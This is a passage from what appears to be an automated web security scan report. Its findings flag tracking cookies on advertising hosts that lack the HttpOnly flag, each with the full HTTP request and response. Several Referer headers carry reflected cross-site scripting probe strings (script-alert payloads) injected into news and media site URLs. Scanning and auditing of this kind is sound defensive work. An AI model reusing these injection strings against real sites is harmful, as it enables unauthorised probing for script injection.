P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web204
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: close
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: GF_1640683793=http://www.observer.com/; path=/
Set-Cookie: GF_1640683793=http://www.observer.com/; domain=gigya.com; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; domain=gigya.com; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; domain=gigya.com; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
5.25. http://d.adroll.com/check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 12 Sep 2011 12:49:02 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/i/blank.gif
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

5.26. http://d.adroll.com/pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7?pv=31528584146.87216&cookie=&keyw= HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 12 Sep 2011 12:50:17 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

5.27. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d3/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24; FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0:0:0; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2
If-None-Match: "436874d-5d7-4aa4ddaecd340"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Tue, 11 Sep 2012 12:49:18 GMT;domain=.zedo.com;path=/;
ETag: "9e27dc-5d7-4aa4ddaecd340"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=419812
Expires: Sat, 17 Sep 2011 09:26:10 GMT
Date: Mon, 12 Sep 2011 12:49:18 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...
5.28. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://rs.gwallet.com/r1/pixel/x420r5075003
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2; FFgeo=5386156; FFcat=933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=1:0:0:0:0:0:0; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Sun, 11 Dec 2011 12:49:31 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=985B826,20|121_977#0;expires=Tue, 11 Sep 2012 12:49:31 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=8401
Expires: Mon, 12 Sep 2011 15:09:32 GMT
Date: Mon, 12 Sep 2011 12:49:31 GMT
Connection: close

GIF89a.............!.......,...........D..;


5.29. http://d7.zedo.com/utils/ecSet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h484782Za669088Zc826000622%2C826000622Zs403Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=945
Date: Mon, 12 Sep 2011 12:48:46 GMT
Connection: close


5.30. http://dts1.raasnet.com/dts/bizo/in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/bizo/in

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/bizo/in?industry=business_services&location=texas HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close

5.31. http://dts1.raasnet.com/dts/exelate/in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/exelate/in

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/exelate/in?segments=&t=i HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close

5.32. http://dts1.raasnet.com/dts/targus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/targus

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/targus?segment=000&zip=&fage=&fgender=&fts=&sage=&sgender=&sts= HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close

5.33. http://f21.360tag.com/t6/1418/MTV/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f21.360tag.com
Path:   /t6/1418/MTV/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t6/1418/MTV/?rf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&l=en-US&pg=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&pl=Win32&cd=16&rs=1920x1200&tz=300&je=true&rn=1405901022&at=PageView&tv=1&t360_T=2&t360_RN2=1967621374&t360_Referrer=&txd=360tag.com HTTP/1.1
Host: f21.360tag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: t1=N1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private,no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1066373836/?label=hLH-CJz7gQIQzKW-_AM&guid=ON&script=0
Set-Cookie: tguid=d37d83f3-b7f3-4436-ae61-5a4ec6697d9e; domain=.360tag.com; expires=Sun, 12-Sep-2021 13:05:06 GMT; path=/
Set-Cookie: tid=0; domain=.360tag.com; expires=Sun, 11-Sep-2011 13:05:06 GMT; path=/
Set-Cookie: sguid=466d899d-3f45-470d-9e6b-6f8d7ed32ebd; domain=.360tag.com; path=/
X-Powered-By: PHP/5.2.11
Server: Apache/2.2.14
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC", policyref="http://www.360tag.com/w3c/p3p.xml"
Date: Mon, 12 Sep 2011 13:05:05 GMT
Content-Length: 0

5.34. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=0 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:57 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;
5.35. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831718_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:38 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 554

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...
5.36. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2


5.37. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=104&g=250&j=0 HTTP/1.1
Host: load.exelator.com
